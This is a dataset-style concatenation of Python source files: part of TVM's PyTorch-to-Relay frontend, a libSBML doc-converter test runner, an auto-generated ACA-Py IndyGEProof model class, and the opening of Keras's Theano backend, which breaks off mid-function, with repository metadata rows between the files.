        input_vars[ir_input] = inp
    return input_vars
def _unpack_tuple(tup):
    """Expand a Relay tuple (or tuple-typed var) into per-field accessors."""
    def field_items(expr, count):
        return [_expr.TupleGetItem(expr, i) for i in range(count)]

    if isinstance(tup, _expr.Tuple):
        return field_items(tup, len(tup.fields))
    if isinstance(tup.type_annotation, TupleType):
        return field_items(tup, len(tup.type_annotation.fields))
    # shouldn't happen
    assert False

def _get_free_vars_from_block(block):
    """Names used inside ``block`` that are not bound within it."""
    bound = list(_get_input_names(block))
    free_vars = set()
    for node in block.nodes():
        free_vars.update(name for name in _get_input_names(node) if name not in bound)
        bound.extend(_get_output_names(node))
    return free_vars
def get_use_chains(root_node, terminate=lambda _: False):
    """Follow user edges forward from ``root_node``.

    Returns an iterable of chains (lists of nodes). A chain ends when a node
    has no users or when ``terminate(users)`` is true. See get_attr_chains
    below for its usage.
    """
    def walk(node, chain):
        users = _get_users(node)
        if not users or terminate(users):
            return [chain]
        nested = (walk(nxt, chain + [nxt]) for nxt in users)
        return itertools.chain.from_iterable(nested)

    return walk(root_node, [root_node])

def get_attr_chains(root_getattr_node):
    """Returns chains of attribute access starting from root_getattr_node.

    For example, given attribute "block", as in "self.block" when "self"
    points to the top level torch.nn.Module, it returns lists of attribute
    "chains", e.g. ['block', '2'], ['block', '1'],
    ['block', '0', '_packed_params'].

    These sets of attributes form full attribute accessors: "self.block.1"
    and "self.block.2" return the second and third submodule, while
    "self.block.0._packed_params" returns the parameters of the first
    submodule.
    """
    def stop_at_non_getattr(users):
        # A chain ends once no further prim::GetAttr consumes the value.
        return not any(user.kind() == "prim::GetAttr" for user in users)

    return get_use_chains(root_getattr_node, stop_at_non_getattr)
def convert_params(graph, state_dict, use_parser_friendly_name=False):
    """
    Return Relay vars and TVM NDArrays for input parameters.
    A chain of prim::GetAttr nodes is processed one at a time.

    Returns (params, param_tensors, packed_param_map): GetAttr output name ->
    Relay var, full attribute path -> NDArray, and GetAttr output name ->
    packed-params path for quantized modules.
    """
    getattr_nodes = graph.findAllNodes("prim::GetAttr", recurse=True)
    params = {}
    param_tensors = {}
    packed_param_map = {}
    # De-duplicate: the same state_dict entry may be reached through several
    # GetAttr chains; reuse one Relay var per full attribute path.
    vars_by_name = {}
    seen = set()
    attr_name_sep = "_" if use_parser_friendly_name else "."
    for node in getattr_nodes:
        if _get_output_name(node) in seen:
            continue
        for getattrs in get_attr_chains(node):
            seen.update(map(_get_output_name, getattrs))
            full_attr = _getattr_full_name(getattrs, attr_name_sep)
            full_attr_node_name = _get_output_name(getattrs[-1])
            if full_attr.endswith("_packed_params"):  # for quantized models
                packed_param_map[full_attr_node_name] = full_attr
            elif full_attr in state_dict:
                if full_attr in vars_by_name:
                    var = vars_by_name[full_attr]
                else:
                    torch_tensor = state_dict[full_attr]
                    tensor, var = _get_tensor_and_var(torch_tensor, full_attr)
                    param_tensors[full_attr] = tensor
                    vars_by_name[full_attr] = var
                params[full_attr_node_name] = var
    return params, param_tensors, packed_param_map
def get_all_op_names(graph):
    """Return the set of operator kinds appearing anywhere in ``graph``.

    Nodes nested inside prim::If / prim::Loop blocks are included as well.
    """
    all_nodes = list(graph.nodes())
    for control_prim in ("prim::If", "prim::Loop"):
        for prim_node in graph.findAllNodes(control_prim, recurse=True):
            for block in prim_node.blocks():
                all_nodes.extend(block.nodes())
    return {node.kind() for node in all_nodes}
def from_pytorch(
    script_module,
    input_infos,
    custom_convert_map=None,
    default_dtype="float32",
    use_parser_friendly_name=False,
    keep_quantized_weight=False,
):
    """Load PyTorch model in the form of a scripted PyTorch model and convert into relay.
    The companion parameters will be handled automatically.

    Parameters
    ----------
    script_module : TopLevelTracedModule object
        TorchScripted PyTorch graph
        Note: We currently only support traces (ie: torch.jit.trace(model, input))
    input_infos : List of tuples
        Can be (input name, input shape) or (input name, (input shape, input types))
        Graph level input shape and type list
        The same input names need to be used for deployment, so choose easy to
        remember names (such as: input0, input1)
        e.g.
        [('input0', (1, 2)), ('input1', (3, 4))]
        or
        [('input0', ((1, 2), 'int')), ('input1', ((3, 4), 'float'))]
    custom_convert_map : Dictionary of str to Relay op
        A custom op conversion map in the same format as _convert_map above
    default_dtype : str
        The default dtype to use when type information is not provided by PyTorch.
    use_parser_friendly_name : bool
        When True, replace '.' with `_' in a original parameter name.
        The Relay text parser treats a variable name followed by a period as a tuple element access,
        so a variable name like "dense.weight" cannot be parsed correctly.
        Use this option when you want to run the AnnotateSpans pass on the imported module.
    keep_quantized_weight : bool
        Return quantized weights and bias, rather than float ones. PyTorch stores quantized weights
        in a custom format, so we cannot directly access 8 bit weights as Numpy arrays. We use
        a PyTorch function to unpack quantized weights into float32 arrays and quantization
        parameters. By default, we return float32 weights and rely on the QNN lowering and the
        Relay constant folding pass to quantize weights at compile time. In BYOC use cases, however,
        we cannot apply the constant folding pass on a QNN graph. If keep_quantized_weight is True,
        we quantize weights in the frontend using a function that is equivalent to
        qnn.op.quantize(...) operating on Numpy arrays.

    Returns
    -------
    mod : tvm.IRModule
        The module that optimizations will be performed on.
    params : dict of str to tvm.runtime.NDArray
        Dict of converted parameters stored in tvm.runtime.ndarray format
    """
    import torch
    mod = tvm.IRModule()
    prelude = Prelude(mod)
    converter = PyTorchOpConverter(prelude, default_dtype)
    # Work on a copy so the caller's graph is left untouched by JIT passes.
    graph = script_module.graph.copy()
    _run_jit_passes(graph)
    if custom_convert_map:
        converter.update_convert_map(custom_convert_map)
    op_names = get_all_op_names(graph)
    converter.report_missing_conversion(op_names)
    is_module = isinstance(script_module, torch.jit.ScriptModule)
    params = script_module.state_dict() if is_module else {}
    outputs = _get_relay_input_vars(
        graph, input_infos, prelude, default_dtype=default_dtype, is_module=is_module
    )
    if use_parser_friendly_name:
        # Rewrite "a.b.c" parameter names to "a_b_c" for the Relay text parser.
        new_names = [key.replace(".", "_") for key in params.keys()]
        params = dict(zip(new_names, params.values()))
    param_vars, tensors, packed_param_map = convert_params(graph, params, use_parser_friendly_name)
    tvm_params = {k: tvm.nd.array(v) for k, v in tensors.items()}
    outputs.update(param_vars)
    ret_name = _get_input_names(graph.return_node())
    # For quantized models
    quantized_ops = set(["aten::quantize_per_tensor", "quantized::linear_dynamic"])
    if len(quantized_ops.intersection(set(op_names))) > 0:
        weight_quant_params = qnn_torch.get_weight_quant_params(
            script_module, packed_param_map.values()
        )
        input_scales_for_bias = qnn_torch.add_input_quant_params_to_op_inputs(graph)
        qnn_torch.add_quant_params_to_outputs(
            outputs,
            packed_param_map,
            weight_quant_params,
            input_scales_for_bias,
            keep_quantized_weight,
        )
        qnn_torch.add_quant_params(tvm_params, weight_quant_params)
        converter.update_convert_map(qnn_torch.convert_map)
    ret = converter.convert_operators(_get_operator_nodes(graph.nodes()), outputs, ret_name)[0]
    if isinstance(ret, list):
        # ListConstruct kept original python list. Convert to tuple.
        ret = _expr.Tuple(ret)
    # Separate data inputs and parameters to make sure data inputs come first.
    func_args = []
    data_inputs = []
    for arg in _analysis.free_vars(ret):
        if arg.name_hint not in tvm_params.keys():
            data_inputs.append(arg)
        else:
            func_args.append(arg)
    func_args = data_inputs + func_args
    mod["main"] = tvm.relay.Function(func_args, ret)
    return transform.RemoveUnusedFunctions()(mod), tvm_params
| 37.566667
| 120
| 0.579753
|
4a07ade329559516e35a4362e760d0684458baef
| 1,977
|
py
|
Python
|
bindings/python/doc-converter/test/run.py
|
sys-bio/sbml2matlab
|
3e957c3508f85e55cfd4564230240467a55d9c27
|
[
"BSD-3-Clause"
] | 1
|
2021-03-25T23:13:45.000Z
|
2021-03-25T23:13:45.000Z
|
bindings/python/doc-converter/test/run.py
|
luciansmith/sbml2matlab
|
bcc2ec734caacb3b30556d527f2bf8a6f9f57950
|
[
"BSD-3-Clause"
] | 2
|
2016-01-19T18:02:13.000Z
|
2016-02-13T23:07:45.000Z
|
bindings/python/doc-converter/test/run.py
|
sys-bio/sbml2matlab
|
3e957c3508f85e55cfd4564230240467a55d9c27
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
##
## @file run.py
## @brief Unit test runner for libSBML Python doc converter
## @author Mike Hucka
##
## <!--------------------------------------------------------------------------
## This file is part of libSBML. Please visit http://sbml.org for more
## information about SBML, and the latest version of libSBML.
##
## Copyright (C) 2009-2013 jointly by the following organizations:
## 1. California Institute of Technology, Pasadena, CA, USA
##     2. EMBL European Bioinformatics Institute (EMBL-EBI), Hinxton, UK
##
## Copyright (C) 2006-2008 by the California Institute of Technology,
## Pasadena, CA, USA
##
## Copyright (C) 2002-2005 jointly by the following organizations:
## 1. California Institute of Technology, Pasadena, CA, USA
## 2. Japan Science and Technology Agency, Japan
##
## This library is free software; you can redistribute it and/or modify it
## under the terms of the GNU Lesser General Public License as published by
## the Free Software Foundation. A copy of the license agreement is provided
## in the file named "LICENSE.txt" included with this software distribution
## and also available online as http://sbml.org/software/libsbml/license.html
## ------------------------------------------------------------------------ -->
import argparse
import os
import sys
import unittest

# Configure command line arguments and process them.
# If -h is provided, argparse will print the help and automatically exit.
help_prolog = "Run tests for libSBML's Python document string converter."
help_epilog = '''If given no arguments, this will run all the unit tests in
the "cases" subdirectory.'''
parser = argparse.ArgumentParser(description=help_prolog, epilog=help_epilog)
parser.parse_args()

# Run the tests discovered in the "cases" directory next to this file.
ourdir = os.path.dirname(os.path.abspath(__file__))
tests = unittest.TestLoader().discover(start_dir=os.path.join(ourdir, 'cases'))
runner = unittest.runner.TextTestRunner()
result = runner.run(tests)

# BUG FIX: propagate failure to the caller. Previously the run result was
# discarded (and the ``sys`` import unused), so the script always exited with
# status 0 even when tests failed, hiding failures from CI/shell scripts.
sys.exit(0 if result.wasSuccessful() else 1)
| 39.54
| 79
| 0.682347
|
4a07ae326e068ff0b206e445bee89e06a314dacb
| 3,619
|
py
|
Python
|
acapy_client/models/indy_ge_proof.py
|
dbluhm/acapy-client
|
d92ef607ba2ff1152ec15429f2edb20976991424
|
[
"Apache-2.0"
] | 4
|
2021-08-05T09:20:34.000Z
|
2021-08-08T19:37:29.000Z
|
acapy_client/models/indy_ge_proof.py
|
dbluhm/acapy-client
|
d92ef607ba2ff1152ec15429f2edb20976991424
|
[
"Apache-2.0"
] | null | null | null |
acapy_client/models/indy_ge_proof.py
|
dbluhm/acapy-client
|
d92ef607ba2ff1152ec15429f2edb20976991424
|
[
"Apache-2.0"
] | 2
|
2021-08-12T18:18:45.000Z
|
2021-08-14T13:22:28.000Z
|
from typing import Any, Dict, List, Type, TypeVar, Union
import attr
from ..models.indy_ge_proof_pred import IndyGEProofPred
from ..models.indy_ge_proof_r import IndyGEProofR
from ..models.indy_ge_proof_t import IndyGEProofT
from ..models.indy_ge_proof_u import IndyGEProofU
from ..types import UNSET, Unset
T = TypeVar("T", bound="IndyGEProof")
@attr.s(auto_attribs=True)
class IndyGEProof:
    """Auto-generated OpenAPI model for an Indy "GE" proof component.

    Every declared field is optional: absent values are represented by the
    UNSET sentinel and omitted during serialization. Unknown keys found in
    incoming JSON are preserved in ``additional_properties`` and exposed via
    the mapping-style dunder methods below.
    """
    alpha: Union[Unset, str] = UNSET
    mj: Union[Unset, str] = UNSET
    predicate: Union[Unset, IndyGEProofPred] = UNSET
    r: Union[Unset, IndyGEProofR] = UNSET
    t: Union[Unset, IndyGEProofT] = UNSET
    u: Union[Unset, IndyGEProofU] = UNSET
    # Catch-all for JSON keys not declared above; excluded from __init__.
    additional_properties: Dict[str, Any] = attr.ib(init=False, factory=dict)
    def to_dict(self) -> Dict[str, Any]:
        """Serialize to a plain dict, omitting UNSET fields."""
        alpha = self.alpha
        mj = self.mj
        # Nested models are serialized recursively, but only when set.
        predicate: Union[Unset, Dict[str, Any]] = UNSET
        if not isinstance(self.predicate, Unset):
            predicate = self.predicate.to_dict()
        r: Union[Unset, Dict[str, Any]] = UNSET
        if not isinstance(self.r, Unset):
            r = self.r.to_dict()
        t: Union[Unset, Dict[str, Any]] = UNSET
        if not isinstance(self.t, Unset):
            t = self.t.to_dict()
        u: Union[Unset, Dict[str, Any]] = UNSET
        if not isinstance(self.u, Unset):
            u = self.u.to_dict()
        field_dict: Dict[str, Any] = {}
        # Passthrough keys go in first, so declared fields win on clashes.
        field_dict.update(self.additional_properties)
        field_dict.update({})
        if alpha is not UNSET:
            field_dict["alpha"] = alpha
        if mj is not UNSET:
            field_dict["mj"] = mj
        if predicate is not UNSET:
            field_dict["predicate"] = predicate
        if r is not UNSET:
            field_dict["r"] = r
        if t is not UNSET:
            field_dict["t"] = t
        if u is not UNSET:
            field_dict["u"] = u
        return field_dict
    @classmethod
    def from_dict(cls: Type[T], src_dict: Dict[str, Any]) -> T:
        """Deserialize from a dict; leftover keys become additional_properties."""
        d = src_dict.copy()
        alpha = d.pop("alpha", UNSET)
        mj = d.pop("mj", UNSET)
        _predicate = d.pop("predicate", UNSET)
        predicate: Union[Unset, IndyGEProofPred]
        if isinstance(_predicate, Unset):
            predicate = UNSET
        else:
            predicate = IndyGEProofPred.from_dict(_predicate)
        _r = d.pop("r", UNSET)
        r: Union[Unset, IndyGEProofR]
        if isinstance(_r, Unset):
            r = UNSET
        else:
            r = IndyGEProofR.from_dict(_r)
        _t = d.pop("t", UNSET)
        t: Union[Unset, IndyGEProofT]
        if isinstance(_t, Unset):
            t = UNSET
        else:
            t = IndyGEProofT.from_dict(_t)
        _u = d.pop("u", UNSET)
        u: Union[Unset, IndyGEProofU]
        if isinstance(_u, Unset):
            u = UNSET
        else:
            u = IndyGEProofU.from_dict(_u)
        indy_ge_proof = cls(
            alpha=alpha,
            mj=mj,
            predicate=predicate,
            r=r,
            t=t,
            u=u,
        )
        # Whatever was not popped above is an unknown passthrough key.
        indy_ge_proof.additional_properties = d
        return indy_ge_proof
    @property
    def additional_keys(self) -> List[str]:
        """Names of the unknown passthrough keys."""
        return list(self.additional_properties.keys())
    def __getitem__(self, key: str) -> Any:
        return self.additional_properties[key]
    def __setitem__(self, key: str, value: Any) -> None:
        self.additional_properties[key] = value
    def __delitem__(self, key: str) -> None:
        del self.additional_properties[key]
    def __contains__(self, key: str) -> bool:
        return key in self.additional_properties
| 28.952
| 77
| 0.581376
|
4a07af55d008c61f7b313b89f3c6b29773d9f8c9
| 70,615
|
py
|
Python
|
keras/backend/theano_backend.py
|
bjerva/keras
|
8d34e8a362f516b09a6e9f52f07264c9f1e088a9
|
[
"MIT"
] | null | null | null |
keras/backend/theano_backend.py
|
bjerva/keras
|
8d34e8a362f516b09a6e9f52f07264c9f1e088a9
|
[
"MIT"
] | null | null | null |
keras/backend/theano_backend.py
|
bjerva/keras
|
8d34e8a362f516b09a6e9f52f07264c9f1e088a9
|
[
"MIT"
] | 1
|
2020-06-11T02:11:58.000Z
|
2020-06-11T02:11:58.000Z
|
import theano
from theano import tensor as T
from theano.sandbox.rng_mrg import MRG_RandomStreams as RandomStreams
from theano.tensor.signal import pool
from theano.tensor.nnet import conv3d2d
from theano.printing import Print
try:
import theano.sparse as th_sparse_module
except ImportError:
th_sparse_module = None
try:
from theano.tensor.nnet.nnet import softsign as T_softsign
except ImportError:
from theano.sandbox.softsign import softsign as T_softsign
import inspect
import numpy as np
from .common import _FLOATX, floatx, _EPSILON, image_dim_ordering
# Keep a reference to the builtin ``all``: this module defines its own
# ``all`` below (the Theano logical-AND reduction), shadowing the builtin.
py_all = all
# INTERNAL UTILS
theano.config.floatX = _FLOATX
_LEARNING_PHASE = T.scalar(dtype='uint8', name='keras_learning_phase')  # 0 = test, 1 = train
def learning_phase():
    """Return the current learning-phase flag (False/0 = test, True/1 = train)."""
    return _LEARNING_PHASE

def set_learning_phase(value):
    """Pin the module-wide learning phase to a fixed value (0 or 1)."""
    global _LEARNING_PHASE
    if value not in (0, 1):
        raise ValueError('Expected learning phase to be '
                         '0 or 1.')
    _LEARNING_PHASE = value
# VARIABLE MANIPULATION
def _assert_sparse_module():
    """Raise ImportError if theano.sparse could not be imported."""
    if th_sparse_module:
        return
    raise ImportError("Failed to import theano.sparse\n"
                      "You probably need to pip install nose-parameterized")

def is_sparse(tensor):
    """True when ``tensor`` is a Theano sparse variable (and sparse support exists)."""
    return th_sparse_module and isinstance(tensor.type, th_sparse_module.SparseType)

def to_dense(tensor):
    """Densify a sparse tensor; dense tensors pass through unchanged."""
    if not is_sparse(tensor):
        return tensor
    return th_sparse_module.dense_from_sparse(tensor)
def is_explicit_shape(shape):
    """True when ``shape`` is an iterable whose entries are all ints or None."""
    if not hasattr(shape, '__iter__'):
        return False
    for dim in shape:
        if dim is not None and not isinstance(dim, int):
            return False
    return True
def variable(value, dtype=None, name=None):
    """Instantiates a variable and returns it.

    # Arguments
        value: Numpy array, initial value of the tensor.
        dtype: Tensor type.
        name: Optional name string for the tensor.

    # Returns
        A variable instance (with Keras metadata included).
    """
    if dtype is None:
        dtype = floatx()
    if hasattr(value, 'tocoo'):
        # 'tocoo' duck-types scipy sparse matrices.
        # NOTE(review): ``dtype`` is not applied on this branch — the sparse
        # value's own dtype is kept; confirm that is intentional.
        _assert_sparse_module()
        variable = th_sparse_module.as_sparse_variable(value)
    else:
        value = np.asarray(value, dtype=dtype)
        variable = theano.shared(value=value, name=name, strict=False)
    variable._keras_shape = value.shape
    variable._uses_learning_phase = False
    return variable
def placeholder(shape=None, ndim=None, dtype=None, sparse=False, name=None):
    """Instantiate an input data placeholder variable.

    # Arguments
        shape: Optional static shape (entries may be None); inferred from
            ``ndim`` as all-None when omitted.
        ndim: Optional rank; ignored when ``shape`` is given.
        dtype: Element type; defaults to ``floatx()``.
        sparse: When True, create a sparse CSR placeholder.
        name: Optional name string.

    # Raises
        ValueError: when neither ``shape`` nor ``ndim`` is given.
    """
    if dtype is None:
        dtype = floatx()
    if shape is None and ndim is None:
        raise ValueError('Specify either a shape or ndim value.')
    if shape is not None:
        ndim = len(shape)
    else:
        shape = tuple([None for _ in range(ndim)])
    # No axis is marked broadcastable on placeholders.
    broadcast = (False,) * ndim
    if sparse:
        _assert_sparse_module()
        x = th_sparse_module.csr_matrix(name=name, dtype=dtype)
    else:
        x = T.TensorType(dtype, broadcast)(name)
    x._keras_shape = shape
    x._uses_learning_phase = False
    return x
def shape(x):
    """Return the symbolic shape of a tensor.

    Warning: type returned will be different for
    Theano backend (Theano tensor type) and TF backend (TF TensorShape).
    """
    return x.shape

def int_shape(x):
    """Return the static shape of a Keras tensor/variable as a tuple.

    # Arguments
        x: Tensor or variable.

    # Returns
        A tuple of integers (or None entries).

    # Raises
        Exception: when ``x`` carries no Keras shape metadata.
    """
    try:
        return x._keras_shape
    except AttributeError:
        raise Exception('Not a Keras tensor:', x)
def ndim(x):
    """Number of axes of a tensor."""
    return x.ndim

def dtype(x):
    """Dtype of a tensor."""
    return x.dtype

def eval(x):
    """Evaluate a (possibly sparse) tensor and return its value.

    Note: intentionally shadows the builtin ``eval`` inside this module.
    """
    dense = to_dense(x)
    return dense.eval()
def zeros(shape, dtype=None, name=None):
    """Instantiate an all-zeros Keras variable."""
    if dtype is None:
        dtype = floatx()
    return variable(np.zeros(shape), dtype, name)

def ones(shape, dtype=None, name=None):
    """Instantiate an all-ones Keras variable."""
    if dtype is None:
        dtype = floatx()
    return variable(np.ones(shape), dtype, name)

def eye(size, dtype=None, name=None):
    """Instantiate an identity-matrix Keras variable."""
    if dtype is None:
        dtype = floatx()
    return variable(np.eye(size), dtype, name)
def ones_like(x, name=None):
    """Symbolic tensor of ones with the same shape as ``x``."""
    return T.ones_like(x)

def zeros_like(x, name=None):
    """Symbolic tensor of zeros with the same shape as ``x``."""
    return T.zeros_like(x)

def random_uniform_variable(shape, low, high, dtype=None, name=None):
    """Variable initialized by sampling Uniform(low, high)."""
    return variable(np.random.uniform(low=low, high=high, size=shape),
                    dtype=dtype, name=name)

def random_normal_variable(shape, mean, scale, dtype=None, name=None):
    """Variable initialized by sampling Normal(mean, scale).

    BUG FIX: ``mean`` was previously ignored (``loc`` was hard-coded to 0.0),
    so every "normal" initialization was zero-centered regardless of the
    requested mean.
    """
    return variable(np.random.normal(loc=mean, scale=scale, size=shape),
                    dtype=dtype, name=name)

def count_params(x):
    """Return the number of scalars in a tensor.

    # Returns
        A numpy integer.
    """
    return np.prod(x.shape.eval())

def cast(x, dtype):
    """Cast a tensor to ``dtype``."""
    return T.cast(x, dtype)
# UPDATES OPS
def update(x, new_x):
    """Update pair: assign ``new_x`` to ``x``."""
    return x, new_x

def update_add(x, increment):
    """Update pair: add ``increment`` to ``x``."""
    return x, x + increment

def update_sub(x, decrement):
    """Update pair: subtract ``decrement`` from ``x``."""
    return x, x - decrement

def moving_average_update(variable, value, momentum):
    """Update pair: exponential moving average of ``variable`` toward ``value``."""
    averaged = variable * momentum + value * (1. - momentum)
    return variable, averaged
# LINEAR ALGEBRA
"""
Assumed overridden:
+, -, /, *, +=, -=, *=, /=
"""
def dot(x, y):
    """Dot product of two tensors; supports a sparse left operand."""
    # TODO: `keras_shape` inference.
    if is_sparse(x):
        return th_sparse_module.basic.structured_dot(x, y)
    return T.dot(x, y)
def batch_dot(x, y, axes=None):
    """Batchwise dot product.
    batch_dot results in a tensor with less dimensions than the input.
    If the number of dimensions is reduced to 1, we use `expand_dims` to
    make sure that ndim is at least 2.
    # Arguments
        x, y: tensors with ndim >= 2
        axes: list (or single) int with target dimensions
    # Returns
        A tensor with shape equal to the concatenation of x's shape
        (less the dimension that was summed over) and y's shape
        (less the batch dimension and the dimension that was summed over).
        If the final rank is 1, we reshape it to (batch_size, 1).
    # Examples
        Assume x = [[1, 2], [3, 4]] and y = [[5, 6], [7, 8]]
        batch_dot(x, y, axes=1) = [[17, 53]] which is the main diagonal
        of x.dot(y.T), although we never have to calculate the off-diagonal
        elements.
        Shape inference:
        Let x's shape be (100, 20) and y's shape be (100, 30, 20).
        If dot_axes is (1, 2), to find the output shape of resultant tensor,
        loop through each dimension in x's shape and y's shape:
        x.shape[0] : 100 : append to output shape
        x.shape[1] : 20 : do not append to output shape,
            dimension 1 of x has been summed over. (dot_axes[0] = 1)
        y.shape[0] : 100 : do not append to output shape,
            always ignore first dimension of y
        y.shape[1] : 30 : append to output shape
        y.shape[2] : 20 : do not append to output shape,
            dimension 2 of y has been summed over. (dot_axes[1] = 2)
        output_shape = (100, 30)
    """
    # TODO: `keras_shape` inference.
    if isinstance(axes, int):
        # A single int means "sum over this axis on both operands".
        axes = (axes, axes)
    if axes is None:
        # behaves like tf.batch_matmul as default
        axes = [x.ndim - 1, y.ndim - 2]
    out = T.batched_tensordot(x, y, axes=axes)
    if ndim(out) == 1:
        # Keep at least 2 dims so downstream code always sees a batch axis.
        out = expand_dims(out, 1)
    return out
def transpose(x):
    """Transpose a tensor."""
    # TODO: `keras_shape` inference.
    return T.transpose(x)

def gather(reference, indices):
    """Select entries of ``reference`` at the given integer ``indices``.

    # Returns
        A tensor of the same type as ``reference``.
    """
    # TODO: `keras_shape` inference.
    return reference[indices]
# ELEMENT-WISE OPERATIONS
def max(x, axis=None, keepdims=False):
    """Maximum of tensor values alongside the specified axis (shadows builtin)."""
    return T.max(x, axis=axis, keepdims=keepdims)
def min(x, axis=None, keepdims=False):
    """Minimum of tensor values alongside the specified axis (shadows builtin)."""
    return T.min(x, axis=axis, keepdims=keepdims)
def sum(x, axis=None, keepdims=False):
    """Sum of the values in a tensor, alongside the specified axis.
    """
    return T.sum(x, axis=axis, keepdims=keepdims)
def prod(x, axis=None, keepdims=False):
    """Multiply the values in a tensor, alongside the specified axis.
    """
    return T.prod(x, axis=axis, keepdims=keepdims)
def mean(x, axis=None, keepdims=False):
    """Mean of a tensor, alongside the specified axis.
    """
    # Integer/bool inputs are promoted to floatx so the mean is not truncated.
    dtype = None
    # bool is available since theano v0.9dev
    if 'int' in x.dtype or x.dtype == 'bool':
        dtype = floatx()
    return T.mean(x, axis=axis, keepdims=keepdims, dtype=dtype)
def std(x, axis=None, keepdims=False):
    """Standard deviation alongside the specified axis."""
    return T.std(x, axis=axis, keepdims=keepdims)
def var(x, axis=None, keepdims=False):
    """Variance alongside the specified axis."""
    return T.var(x, axis=axis, keepdims=keepdims)
def any(x, axis=None, keepdims=False):
    """Bitwise reduction (logical OR).
    """
    return T.any(x, axis=axis, keepdims=keepdims)
def all(x, axis=None, keepdims=False):
    """Bitwise reduction (logical AND). Shadows the builtin; see ``py_all``.
    """
    return T.all(x, axis=axis, keepdims=keepdims)
def argmax(x, axis=-1):
    """Index of the maximum along ``axis``."""
    return T.argmax(x, axis=axis, keepdims=False)
def argmin(x, axis=-1):
    """Index of the minimum along ``axis``."""
    return T.argmin(x, axis=axis, keepdims=False)
def square(x):
    """Element-wise square."""
    return T.sqr(x)
def abs(x):
    """Element-wise absolute value (shadows builtin)."""
    return T.abs_(x)
def sqrt(x):
    """Element-wise square root; negative inputs are clamped to 0 first."""
    x = T.clip(x, 0., np.inf)
    return T.sqrt(x)
def exp(x):
    """Element-wise exponential."""
    return T.exp(x)
def log(x):
    """Element-wise natural logarithm."""
    return T.log(x)
def round(x):
    """Element-wise rounding (shadows builtin)."""
    return T.round(x)
def sign(x):
    """Element-wise sign."""
    return T.sgn(x)
def pow(x, a):
    """Element-wise power (shadows builtin)."""
    return T.pow(x, a)
def clip(x, min_value, max_value):
    """Element-wise clipping; an inverted range collapses to ``min_value``."""
    if max_value < min_value:
        max_value = min_value
    return T.clip(x, min_value, max_value)
def equal(x, y):
    """Element-wise x == y."""
    return T.eq(x, y)
def not_equal(x, y):
    """Element-wise x != y."""
    return T.neq(x, y)
def greater(x, y):
    """Element-wise x > y."""
    return T.gt(x, y)
def greater_equal(x, y):
    """Element-wise x >= y."""
    return T.ge(x, y)
def lesser(x, y):
    """Element-wise x < y."""
    return T.lt(x, y)
def lesser_equal(x, y):
    """Element-wise x <= y."""
    return T.le(x, y)
def maximum(x, y):
    """Element-wise maximum of two tensors."""
    return T.maximum(x, y)
def minimum(x, y):
    """Element-wise minimum of two tensors."""
    return T.minimum(x, y)
def sin(x):
    """Element-wise sine."""
    return T.sin(x)
def cos(x):
    """Element-wise cosine."""
    return T.cos(x)
def normalize_batch_in_training(x, gamma, beta,
                                reduction_axes, epsilon=1e-3):
    """Computes mean and std for batch then apply batch_normalization on batch.

    Returns (normalized_x, mean, variance); the variance is recovered from
    the inverse standard deviation as 1 / stdinv**2.
    """
    # TODO remove this if statement when Theano without
    # T.nnet.bn.batch_normalization_train is deprecated
    if not hasattr(T.nnet.bn, 'batch_normalization_train'):
        return _old_normalize_batch_in_training(x, gamma, beta, reduction_axes, epsilon)
    normed, mean, stdinv = T.nnet.bn.batch_normalization_train(
        x, gamma, beta, reduction_axes, epsilon)
    return normed, mean, T.inv(stdinv ** 2)
def batch_normalization(x, mean, var, beta, gamma, epsilon=1e-3):
    """Apply batch normalization on x given mean, var, beta and gamma.
    """
    # TODO remove this if statement when Theano without
    # T.nnet.bn.batch_normalization_test is deprecated
    if not hasattr(T.nnet.bn, 'batch_normalization_test'):
        return _old_batch_normalization(x, mean, var, beta, gamma, epsilon)
    if mean.ndim == 1:
        # based on TensorFlow's default: normalize along rightmost dimension
        # NOTE(review): a range object is passed here while the branch below
        # passes a list — confirm Theano accepts both.
        reduction_axes = range(x.ndim - 1)
    else:
        reduction_axes = [i for i in range(x.ndim) if mean.broadcastable[i]]
    return T.nnet.bn.batch_normalization_test(
        x, gamma, beta, mean, var, reduction_axes, epsilon)
# TODO remove this function when Theano without
# T.nnet.bn.batch_normalization_train is deprecated
def _old_normalize_batch_in_training(x, gamma, beta,
                                     reduction_axes, epsilon=1e-3):
    """Computes mean and std for batch then apply batch_normalization on batch.

    Legacy path for old Theano versions. Tries the cuDNN spatial kernel
    first (4D inputs normalized over axes [0, 2, 3] on a GPU device) and
    falls back to a pure-Theano implementation on AttributeError.
    """
    dev = theano.config.device
    use_cudnn = ndim(x) < 5 and reduction_axes == [0, 2, 3] and (dev.startswith('cuda') or dev.startswith('gpu'))
    if use_cudnn:
        broadcast_beta = beta.dimshuffle('x', 0, 'x', 'x')
        broadcast_gamma = gamma.dimshuffle('x', 0, 'x', 'x')
        try:
            normed, mean, stdinv = theano.sandbox.cuda.dnn.dnn_batch_normalization_train(
                x, broadcast_gamma, broadcast_beta, 'spatial', epsilon)
            normed = theano.tensor.as_tensor_variable(normed)
            mean = theano.tensor.as_tensor_variable(mean)
            stdinv = theano.tensor.as_tensor_variable(stdinv)
            # cuDNN returns the inverse std; recover variance as 1/stdinv**2.
            var = T.inv(stdinv ** 2)
            return normed, T.flatten(mean), T.flatten(var)
        except AttributeError:
            pass
    var = x.var(reduction_axes)
    mean = x.mean(reduction_axes)
    # Build a shape with 1s along the reduced axes so the statistics
    # broadcast back against x.
    target_shape = []
    for axis in range(ndim(x)):
        if axis in reduction_axes:
            target_shape.append(1)
        else:
            target_shape.append(x.shape[axis])
    target_shape = T.stack(*target_shape)
    broadcast_mean = T.reshape(mean, target_shape)
    broadcast_var = T.reshape(var, target_shape)
    broadcast_beta = T.reshape(beta, target_shape)
    broadcast_gamma = T.reshape(gamma, target_shape)
    normed = batch_normalization(x, broadcast_mean, broadcast_var,
                                 broadcast_beta, broadcast_gamma,
                                 epsilon)
    return normed, mean, var
# TODO remove this if statement when Theano without
# T.nnet.bn.batch_normalization_test is deprecated
def _old_batch_normalization(x, mean, var, beta, gamma, epsilon=1e-3):
    """Apply batch normalization on x given mean, var, beta and gamma.

    Legacy path for old Theano versions; tries the cuDNN kernel on GPU
    devices and otherwise uses T.nnet.bn.batch_normalization.
    """
    if mean.ndim == 1 and x.ndim > 1:
        # in TensorFlow's batch_normalization, if the parameters are vectors
        # the batch normalization should be applied along the rightmost axis.
        # Theano expects the parameters to always have x.ndim dimensions.
        shuffle_pattern = ['x'] * (x.ndim - 1) + [0]
